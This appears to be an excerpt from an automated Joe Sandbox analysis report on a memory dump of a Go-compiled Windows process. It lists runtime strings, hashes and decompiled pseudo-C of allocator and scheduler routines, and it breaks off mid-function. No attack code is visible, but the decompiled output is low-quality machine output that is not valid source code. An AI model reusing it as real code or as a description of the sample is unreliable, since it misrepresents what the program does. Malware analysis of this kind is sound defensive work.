                                                                                                                            • G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile b, xrefs: 0130526A
                                                                                                                            • unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->sta, xrefs: 01304D86
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile b$unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->sta
                                                                                                                            • API String ID: 0-4218621180
                                                                                                                            • Opcode ID: decc5d0ee1d1fda7a2b4d6393fc50350538b18f5c8554ba30501523ba231b98e
                                                                                                                            • Instruction ID: 0772e1aef6eba969fb9efe242d27266e6f260e4ea9a5fe730979e3493c234e1a
                                                                                                                            • Opcode Fuzzy Hash: decc5d0ee1d1fda7a2b4d6393fc50350538b18f5c8554ba30501523ba231b98e
                                                                                                                            • Instruction Fuzzy Hash: B602DE72204B84C6DB61DB2AE45039AB7A5F799FC8F589025CF8C47BA9CF39C589C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • grew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemultiple Read calls return no data or errornon in-use span found with specials bit setro, xrefs: 0132284C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: grew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemultiple Read calls return no data or errornon in-use span found with specials bit setro
                                                                                                                            • API String ID: 0-2241047259
                                                                                                                            • Opcode ID: 494e14c4a39be88f35f18bd47da632fba93b99b8b11610fd0c15cf0a9b84ea5e
                                                                                                                            • Instruction ID: 51398b8b68c15845f67ea855276f4a2f3605b133e3b9c4a9adf15d82657adba5
                                                                                                                            • Opcode Fuzzy Hash: 494e14c4a39be88f35f18bd47da632fba93b99b8b11610fd0c15cf0a9b84ea5e
                                                                                                                            • Instruction Fuzzy Hash: D5F16F72209B9482DB219B19E48039BBBA1F799BD8F585126DFCD47B29DF3CC490CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base poin, xrefs: 0131CDCB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base poin
                                                                                                                            • API String ID: 0-2094354515
                                                                                                                            • Opcode ID: 7cd413dadb349a4e9f1098b97ff9deaf6c1dd322112ea63ff5acea9dc3ff4657
                                                                                                                            • Instruction ID: 347dc7d8a2487f83865bec5aeacc90d014a69bdc21c36c85e99c907dc28a2e31
                                                                                                                            • Opcode Fuzzy Hash: 7cd413dadb349a4e9f1098b97ff9deaf6c1dd322112ea63ff5acea9dc3ff4657
                                                                                                                            • Instruction Fuzzy Hash: 44A1D03224AF4985DB06DF39E840396A765FB96BC8F44A222EA4E53779DF3CC085C700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 57%
                                                                                                                            			E01345B60(void* __ebx, void* __ecx, void* __edx, void* __esp, signed long long __rax, signed long long __rbx, signed long long __rcx, signed long long __rdi, signed long long __rsi, long long __rbp, signed long long __r8, signed long long __r9, void* __r13, intOrPtr* __r14, signed long long _a8, signed long long _a16, signed long long _a24, signed long long _a32) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				void* _v24;
                                                                                                                            				signed long long _v32;
                                                                                                                            				signed long long _v40;
                                                                                                                            				signed long long _v48;
                                                                                                                            				signed long long _v56;
                                                                                                                            				signed long long _v64;
                                                                                                                            				signed long long _v72;
                                                                                                                            				signed long long _v80;
                                                                                                                            				signed long long _v88;
                                                                                                                            				void* _t52;
                                                                                                                            				void* _t56;
                                                                                                                            				void* _t59;
                                                                                                                            				signed int _t62;
                                                                                                                            				signed int _t64;
                                                                                                                            				void* _t65;
                                                                                                                            				void* _t77;
                                                                                                                            				signed long long _t79;
                                                                                                                            				signed long long _t87;
                                                                                                                            				signed long long _t90;
                                                                                                                            				signed long long _t92;
                                                                                                                            				signed long long _t96;
                                                                                                                            				signed long long _t97;
                                                                                                                            				signed long long _t99;
                                                                                                                            				signed long long _t101;
                                                                                                                            				signed long long _t102;
                                                                                                                            				signed long long _t103;
                                                                                                                            				signed long long _t105;
                                                                                                                            				signed long long _t108;
                                                                                                                            				void* _t113;
                                                                                                                            				signed long long _t118;
                                                                                                                            				signed long long _t119;
                                                                                                                            				intOrPtr _t121;
                                                                                                                            				signed long long _t122;
                                                                                                                            				signed long long _t123;
                                                                                                                            				signed long long _t124;
                                                                                                                            				signed long long _t125;
                                                                                                                            				signed long long _t126;
                                                                                                                            				intOrPtr _t127;
                                                                                                                            				signed long long _t130;
                                                                                                                            				signed long long _t131;
                                                                                                                            				void* _t133;
                                                                                                                            				intOrPtr* _t134;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t134 = __r14;
                                                                                                                            					_t133 = __r13;
                                                                                                                            					_t122 = __r9;
                                                                                                                            					_t118 = __r8;
                                                                                                                            					_t109 = __rbp;
                                                                                                                            					_t102 = __rsi;
                                                                                                                            					_t99 = __rdi;
                                                                                                                            					_t92 = __rcx;
                                                                                                                            					_t87 = __rbx;
                                                                                                                            					_t79 = __rax;
                                                                                                                            					_t65 = __esp;
                                                                                                                            					_t59 = __ecx;
                                                                                                                            					_t56 = __ebx;
                                                                                                                            					if(_t113 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L39;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t109 =  &_v8;
                                                                                                                            					_a16 = __rbx;
                                                                                                                            					if(__rcx == 0) {
                                                                                                                            						L3:
                                                                                                                            						_t62 = 0;
                                                                                                                            					} else {
                                                                                                                            						L2:
                                                                                                                            						_t96 = __rbx;
                                                                                                                            						_t64 = 0;
                                                                                                                            						_t62 = 0;
                                                                                                                            						r8d = 0;
                                                                                                                            						r9d = 0;
                                                                                                                            						L32:
                                                                                                                            						_t127 =  *((intOrPtr*)(_t87 + 8));
                                                                                                                            						if(_t127 != 0) {
                                                                                                                            							L34:
                                                                                                                            							_t119 = _t122 + _t127;
                                                                                                                            							if(_t122 > _t119) {
                                                                                                                            								L38:
                                                                                                                            								_t79 = 0x138bee7;
                                                                                                                            								E01330BA0(0x138bee7, _t87, _t109);
                                                                                                                            								goto L39;
                                                                                                                            							} else {
                                                                                                                            								L35:
                                                                                                                            								_t99 = _t99 + 1;
                                                                                                                            								_t123 = _t102;
                                                                                                                            								goto L36;
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							L33:
                                                                                                                            							_t123 = _t102;
                                                                                                                            							_t102 = _t118;
                                                                                                                            							_t119 = _t122;
                                                                                                                            							L36:
                                                                                                                            							_t122 = _t123 + 1;
                                                                                                                            							if(_t92 > _t122) {
                                                                                                                            								L31:
                                                                                                                            								_t87 = _t90 + 0x10;
                                                                                                                            								_t126 = _t102;
                                                                                                                            								_t102 = _t122;
                                                                                                                            								_t122 = _t119;
                                                                                                                            								_t118 = _t126;
                                                                                                                            								goto L32;
                                                                                                                            							} else {
                                                                                                                            								L37:
                                                                                                                            								_t87 = _t96;
                                                                                                                            								_t96 = _t99;
                                                                                                                            								_t99 = _t119;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L4:
                                                                                                                            					if(_t96 == 0) {
                                                                                                                            						L19:
                                                                                                                            						return 0;
                                                                                                                            					} else {
                                                                                                                            						L5:
                                                                                                                            						if(_t96 != 1) {
                                                                                                                            							L13:
                                                                                                                            							_t97 = _t102;
                                                                                                                            							_t64 = 0;
                                                                                                                            							goto L14;
                                                                                                                            						} else {
                                                                                                                            							L6:
                                                                                                                            							if(_t79 == 0) {
                                                                                                                            								L8:
                                                                                                                            								if(_t92 <= _t102) {
                                                                                                                            									goto L30;
                                                                                                                            								} else {
                                                                                                                            									L9:
                                                                                                                            									_t97 = _t102;
                                                                                                                            									_t103 = _t102 << 4;
                                                                                                                            									_v24 =  *((intOrPtr*)(_t87 + _t103));
                                                                                                                            									_v16 =  *((intOrPtr*)(_t87 + _t103 + 8));
                                                                                                                            									_t102 = _v24;
                                                                                                                            									_t121 =  *((intOrPtr*)(_t134 + 8));
                                                                                                                            									if( *_t134 > _t102) {
                                                                                                                            										_t64 = 0;
                                                                                                                            									} else {
                                                                                                                            										sil = _t102 - _t121 > 0;
                                                                                                                            									}
                                                                                                                            									_t64 = _t64 ^ 0x00000001;
                                                                                                                            									goto L14;
                                                                                                                            								}
                                                                                                                            							} else {
                                                                                                                            								L7:
                                                                                                                            								_t97 = _t102;
                                                                                                                            								_t64 = 1;
                                                                                                                            								L14:
                                                                                                                            								if(sil != 0) {
                                                                                                                            									L17:
                                                                                                                            									if(_t92 <= _t97) {
                                                                                                                            										L20:
                                                                                                                            										E013588C0();
                                                                                                                            										goto L21;
                                                                                                                            									} else {
                                                                                                                            										L18:
                                                                                                                            										return _t52;
                                                                                                                            									}
                                                                                                                            								} else {
                                                                                                                            									L15:
                                                                                                                            									_a24 = _t92;
                                                                                                                            									_a16 = _t87;
                                                                                                                            									_t90 = _t99;
                                                                                                                            									_t52 = E013462A0(_t52, _t56, _t65, _t79, _t90, _t109, _t133, _t134);
                                                                                                                            									_t96 = _a24;
                                                                                                                            									if(_t96 == 0) {
                                                                                                                            										L21:
                                                                                                                            										return _t52;
                                                                                                                            									} else {
                                                                                                                            										L16:
                                                                                                                            										_v48 = _t79;
                                                                                                                            										_v80 = _t90;
                                                                                                                            										_t119 = _a16;
                                                                                                                            										r9d = 0;
                                                                                                                            										while(1) {
                                                                                                                            											L23:
                                                                                                                            											_t125 =  *((intOrPtr*)(_t119 + 8));
                                                                                                                            											_t130 = _t99;
                                                                                                                            											_t99 =  >  ? _t125 : _t99;
                                                                                                                            											_t132 =  *_t119;
                                                                                                                            											if(_t92 !=  *_t119) {
                                                                                                                            												_v40 = _t92;
                                                                                                                            												_v56 = _t122;
                                                                                                                            												_v32 = _t119;
                                                                                                                            												_v64 = _t130;
                                                                                                                            												_v72 = _t102;
                                                                                                                            												_v88 = _t125;
                                                                                                                            												_t52 = L013591E0(_t59, _t62, _t64, _t65, _t92, _t132, _t99, _t122);
                                                                                                                            												_t96 = _a24;
                                                                                                                            												_t90 = _v80;
                                                                                                                            												_t102 = _v72;
                                                                                                                            												_t119 = _v32;
                                                                                                                            												_t122 = _v56;
                                                                                                                            												_t125 = _v88;
                                                                                                                            												_t130 = _v64;
                                                                                                                            												_t92 = _v40;
                                                                                                                            											} else {
                                                                                                                            												_t77 = _t130 - _t125;
                                                                                                                            											}
                                                                                                                            											if(_t77 < 0) {
                                                                                                                            												break;
                                                                                                                            											}
                                                                                                                            											L27:
                                                                                                                            											_t40 = _t122 + 1; // 0x1
                                                                                                                            											_t101 = _t40;
                                                                                                                            											_t105 = _t102 - _t125;
                                                                                                                            											_t131 = _t130 - _t125;
                                                                                                                            											_t124 = _t105;
                                                                                                                            											_t108 = _t92 + (_t125 &  ~_t105 >> 0x0000003f);
                                                                                                                            											if(_t96 > _t101) {
                                                                                                                            												L22:
                                                                                                                            												_t119 = _t119 + 0x10;
                                                                                                                            												_t92 = _t108;
                                                                                                                            												_t102 = _t124;
                                                                                                                            												_t122 = _t101;
                                                                                                                            												_t99 = _t131;
                                                                                                                            												continue;
                                                                                                                            											} else {
                                                                                                                            												L28:
                                                                                                                            												goto L21;
                                                                                                                            											}
                                                                                                                            											goto L40;
                                                                                                                            										}
                                                                                                                            										L29:
                                                                                                                            										_t92 = _t130;
                                                                                                                            										L01358980();
                                                                                                                            										L30:
                                                                                                                            										_t79 = _t102;
                                                                                                                            										E013588C0();
                                                                                                                            										goto L31;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L40:
                                                                                                                            					L39:
                                                                                                                            					_a8 = _t79;
                                                                                                                            					_a16 = _t87;
                                                                                                                            					_a24 = _t92;
                                                                                                                            					_a32 = _t99;
                                                                                                                            					E01356200(_t96, _t109);
                                                                                                                            				}
                                                                                                                            			}

                                                                                                                            0x01345bb4
                                                                                                                            0x01345bb4
                                                                                                                            0x01345bb4
                                                                                                                            0x01345bb7
                                                                                                                            0x01345c07
                                                                                                                            0x01345c0a
                                                                                                                            0x01345c49
                                                                                                                            0x01345c4c
                                                                                                                            0x01345c73
                                                                                                                            0x01345c76
                                                                                                                            0x00000000
                                                                                                                            0x01345c4e
                                                                                                                            0x01345c4e
                                                                                                                            0x01345c64
                                                                                                                            0x01345c64
                                                                                                                            0x01345c0c
                                                                                                                            0x01345c0c
                                                                                                                            0x01345c0c
                                                                                                                            0x01345c14
                                                                                                                            0x01345c1c
                                                                                                                            0x01345c20
                                                                                                                            0x01345c25
                                                                                                                            0x01345c30
                                                                                                                            0x01345c7b
                                                                                                                            0x01345c84
                                                                                                                            0x01345c32
                                                                                                                            0x01345c32
                                                                                                                            0x01345c32
                                                                                                                            0x01345c37
                                                                                                                            0x01345c3c
                                                                                                                            0x01345c44
                                                                                                                            0x01345c95
                                                                                                                            0x01345c95
                                                                                                                            0x01345c95
                                                                                                                            0x01345c9c
                                                                                                                            0x01345c9f
                                                                                                                            0x01345ca3
                                                                                                                            0x01345ca9
                                                                                                                            0x01345cb0
                                                                                                                            0x01345cb5
                                                                                                                            0x01345cba
                                                                                                                            0x01345cbf
                                                                                                                            0x01345cc4
                                                                                                                            0x01345cc9
                                                                                                                            0x01345cd7
                                                                                                                            0x01345ce9
                                                                                                                            0x01345cf1
                                                                                                                            0x01345cf6
                                                                                                                            0x01345cfb
                                                                                                                            0x01345d00
                                                                                                                            0x01345d05
                                                                                                                            0x01345d08
                                                                                                                            0x01345d10
                                                                                                                            0x01345cab
                                                                                                                            0x01345cab
                                                                                                                            0x01345cab
                                                                                                                            0x01345d15
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01345d17
                                                                                                                            0x01345d17
                                                                                                                            0x01345d17
                                                                                                                            0x01345d1b
                                                                                                                            0x01345d1e
                                                                                                                            0x01345d21
                                                                                                                            0x01345d2e
                                                                                                                            0x01345d35
                                                                                                                            0x01345c85
                                                                                                                            0x01345c85
                                                                                                                            0x01345c89
                                                                                                                            0x01345c8c
                                                                                                                            0x01345c8f
                                                                                                                            0x01345c92
                                                                                                                            0x00000000
                                                                                                                            0x01345d40
                                                                                                                            0x01345d40
                                                                                                                            0x00000000
                                                                                                                            0x01345d40
                                                                                                                            0x00000000
                                                                                                                            0x01345d35
                                                                                                                            0x01345d45
                                                                                                                            0x01345d48
                                                                                                                            0x01345d4b
                                                                                                                            0x01345d50
                                                                                                                            0x01345d50
                                                                                                                            0x01345d53
                                                                                                                            0x00000000
                                                                                                                            0x01345d53
                                                                                                                            0x01345c30
                                                                                                                            0x01345c0a
                                                                                                                            0x01345bb2
                                                                                                                            0x01345bad
                                                                                                                            0x00000000
                                                                                                                            0x01345db7
                                                                                                                            0x01345db7
                                                                                                                            0x01345dbc
                                                                                                                            0x01345dc1
                                                                                                                            0x01345dc6
                                                                                                                            0x01345dcb
                                                                                                                            0x01345ddf

                                                                                                                            Strings
                                                                                                                            • string concatenation too longtimeBegin/EndPeriod not foundtoo many open files in system (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for Central European Standard TimeCentral Standard Time (Mexico)E. South America Standa, xrefs: 01345DA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: string concatenation too longtimeBegin/EndPeriod not foundtoo many open files in system (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for Central European Standard TimeCentral Standard Time (Mexico)E. South America Standa
                                                                                                                            • API String ID: 0-949991491
                                                                                                                            • Opcode ID: c57c09dc223a39bc06aa693b5a25d6d06647516bc96d3125632292cfbf49d6e9
                                                                                                                            • Instruction ID: 6356e58f3fa1f83a27f897a71d6ba8062aa5c0364f1b9d4e7b4bb51ba38f56cc
                                                                                                                            • Opcode Fuzzy Hash: c57c09dc223a39bc06aa693b5a25d6d06647516bc96d3125632292cfbf49d6e9
                                                                                                                            • Instruction Fuzzy Hash: 3E51D132B09BA483DB20CF56E44065ABBA5F795FC8F448116DE8D57F18CB38D9428B44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 21%
                                                                                                                            			E013121C0(void* __ebx, signed int __ecx, void* __esi, unsigned int __rbx, signed long long __rsi, long long __rbp, void* __r14, long long _a8, unsigned int _a16, signed int _a24) {
                                                                                                                            				char _v8;
                                                                                                                            				signed long long _v16;
                                                                                                                            				signed long long _v24;
                                                                                                                            				void* _v32;
                                                                                                                            				signed char _v33;
                                                                                                                            				signed int _t59;
                                                                                                                            				void* _t74;
                                                                                                                            				void* _t79;
                                                                                                                            				void* _t81;
                                                                                                                            				signed long long _t94;
                                                                                                                            				unsigned long long _t102;
                                                                                                                            				signed long long _t103;
                                                                                                                            				signed long long _t106;
                                                                                                                            				unsigned long long _t120;
                                                                                                                            				intOrPtr _t127;
                                                                                                                            				signed long long _t129;
                                                                                                                            				long long _t131;
                                                                                                                            				void* _t134;
                                                                                                                            				void* _t137;
                                                                                                                            				void* _t142;
                                                                                                                            				long long _t144;
                                                                                                                            				long long _t145;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t146 = __r14;
                                                                                                                            					_t132 = __rbp;
                                                                                                                            					_t129 = __rsi;
                                                                                                                            					_t106 = __rbx;
                                                                                                                            					_t66 = __ecx;
                                                                                                                            					_t62 = __ebx;
                                                                                                                            					if(_t134 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t132 =  &_v8;
                                                                                                                            					_t122 = __rbx + 0x2000;
                                                                                                                            					if(__rbx > __rbx + 0x2000) {
                                                                                                                            						L12:
                                                                                                                            						E01330BA0(0x1388000, _t106, _t132);
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					_a16 = __rbx;
                                                                                                                            					_a24 = __ecx;
                                                                                                                            					_t94 =  !=  ? (__rbx >> 0xd) + 1 : __rbx >> 0xd;
                                                                                                                            					_v24 = _t94;
                                                                                                                            					_v16 = _t94 << 0xd;
                                                                                                                            					E01320260(__ebx, __ecx, _t74, _t94 << 0xd, _t94,  &_v8, _t137, __r14);
                                                                                                                            					_t66 = _a24 & 0xff;
                                                                                                                            					_v33 = _t66;
                                                                                                                            					_t106 = _v24;
                                                                                                                            					E01321D40(_t66, 0x14915c0, _t106,  &_v8, __r14);
                                                                                                                            					if(0x14915c0 == 0) {
                                                                                                                            						L11:
                                                                                                                            						E01330BA0(0x1388000, _t106, _t132);
                                                                                                                            						goto L12;
                                                                                                                            					}
                                                                                                                            					L3:
                                                                                                                            					_v32 = 0x14915c0;
                                                                                                                            					E0132A100(_t106, _t129,  &_v8, __r14);
                                                                                                                            					asm("lock dec eax");
                                                                                                                            					asm("lock dec eax");
                                                                                                                            					E0132A1E0( &_v8, __r14);
                                                                                                                            					_t106 =  *(_v32 + 0x20) << 0xd;
                                                                                                                            					E0131C140(_t62, 0x14cfc60, _t106, _v32, _t132, _t145, _t146);
                                                                                                                            					_t59 = _v33 & 0x000000ff;
                                                                                                                            					if(0x14cfc60 >= 0x88) {
                                                                                                                            						L10:
                                                                                                                            						_t66 = 0x88;
                                                                                                                            						E013588C0();
                                                                                                                            						goto L11;
                                                                                                                            					}
                                                                                                                            					L4:
                                                                                                                            					_t106 = _v32;
                                                                                                                            					E01329AA0(_t59, 0, _t79, _t81, 0x204f5fd + (_t122 + _t122 * 4) * 8, _t106, _t132, _t142, _t146);
                                                                                                                            					_t131 = _v32;
                                                                                                                            					 *((long long*)(_t131 + 0x70)) =  *((intOrPtr*)(_t131 + 0x18)) + _a16;
                                                                                                                            					_t120 =  *((intOrPtr*)(_t131 + 0x18));
                                                                                                                            					_t102 = 0 + _t120;
                                                                                                                            					_t122 = _t102;
                                                                                                                            					_t103 = _t102 >> 0x2a;
                                                                                                                            					if(_t103 >= 0x40) {
                                                                                                                            						L9:
                                                                                                                            						E013588E0();
                                                                                                                            						goto L10;
                                                                                                                            					}
                                                                                                                            					L5:
                                                                                                                            					_t127 =  *((intOrPtr*)( *((intOrPtr*)(0x14a1750 + _t103 * 8)) + (_t122 >> 0x16) * 8));
                                                                                                                            					if(_t127 == 0) {
                                                                                                                            						r9d = 0;
                                                                                                                            						r8d = 0;
                                                                                                                            						r11d = 0;
                                                                                                                            						r10d = 0;
                                                                                                                            					} else {
                                                                                                                            						_t144 = _t127 + (_t120 >> 5);
                                                                                                                            						r8d = r8d & 0x00000003;
                                                                                                                            						_t42 = _t127 + 0x1ffff; // 0x1ffff
                                                                                                                            						_t145 = _t42;
                                                                                                                            					}
                                                                                                                            					return E01310340(r8d, r9d, _t144, _t145, _t131, _t132, _t144, _t146);
                                                                                                                            					L14:
                                                                                                                            					L13:
                                                                                                                            					_a8 = 0x1388000;
                                                                                                                            					_a16 = _t106;
                                                                                                                            					_a24 = _t66;
                                                                                                                            					E01356200(_t122, _t132);
                                                                                                                            				}
                                                                                                                            			}


























                                                                                                                            Strings
                                                                                                                            • out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCrea, xrefs: 013123A8, 013123B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCrea
                                                                                                                            • API String ID: 0-3248205512
                                                                                                                            • Opcode ID: 3405c28cd91240638588fe0c7f3e4b7b13bcfff9ba20660eb6d9d0b94c90e271
                                                                                                                            • Instruction ID: 5e0085a0dc54636d1772de65ef4d911a266001bed00dda717593306ea3142696
                                                                                                                            • Opcode Fuzzy Hash: 3405c28cd91240638588fe0c7f3e4b7b13bcfff9ba20660eb6d9d0b94c90e271
                                                                                                                            • Instruction Fuzzy Hash: 9151C472314B8186DB14DB19E4903AEBB61F799BC8F985426EB8D43B28DF3CC549CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • gcmarknewobject called while doing checkmarkout of memory allocating heap arena metadataruntime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-point, xrefs: 0131B28F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: gcmarknewobject called while doing checkmarkout of memory allocating heap arena metadataruntime: lfstack.push invalid packing: node=cannot send after transport endpoint shutdownexitsyscall: syscall frame is no longer validheapBitsSetType: called with non-point
                                                                                                                            • API String ID: 0-1626860508
                                                                                                                            • Opcode ID: 157fe05b71aef0e35dd590ef49dec0e67e3db617d23310726b497f02785eb728
                                                                                                                            • Instruction ID: 166118b256cb35b78318a44d1716d4108909ef00503d17a8d660865474d96b20
                                                                                                                            • Opcode Fuzzy Hash: 157fe05b71aef0e35dd590ef49dec0e67e3db617d23310726b497f02785eb728
                                                                                                                            • Instruction Fuzzy Hash: 1321B0B3711B8987EB059F19D4803EC6BA1F396F94F89A566CA4D4775ACA2CC146C300
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A752C0(void* __ecx, void* __rcx, void* __rdx) {
                                                                                                                            				void* _t47;
                                                                                                                            				void* _t65;
                                                                                                                            				void* _t157;
                                                                                                                            				void* _t158;
                                                                                                                            				void* _t159;
                                                                                                                            				void* _t161;
                                                                                                                            				void* _t162;
                                                                                                                            				void* _t163;
                                                                                                                            				void* _t164;
                                                                                                                            				void* _t166;
                                                                                                                            
                                                                                                                            				_t166 = __rcx;
                                                                                                                            				_t157 = __ecx - 0x36;
                                                                                                                            				if (_t157 > 0) goto 0xf8a75692;
                                                                                                                            				if (_t157 == 0) goto 0xf8a75684;
                                                                                                                            				_t158 = __ecx - 0x1c;
                                                                                                                            				if (_t158 > 0) goto 0xf8a754d1;
                                                                                                                            				if (_t158 == 0) goto 0xf8a754c8;
                                                                                                                            				_t159 = __ecx - 0xe;
                                                                                                                            				if (_t159 > 0) goto 0xf8a753e3;
                                                                                                                            				if (_t159 == 0) goto 0xf8a753ce;
                                                                                                                            				if (_t159 == 0) goto 0xf8a753b7;
                                                                                                                            				if (_t159 == 0) goto 0xf8a753a7;
                                                                                                                            				if (_t159 == 0) goto 0xf8a75399;
                                                                                                                            				if (_t159 == 0) goto 0xf8a7538b;
                                                                                                                            				if (_t159 == 0) goto 0xf8a75377;
                                                                                                                            				if (_t159 == 0) goto 0xf8a75362;
                                                                                                                            				if (_t159 == 0) goto 0xf8a7534d;
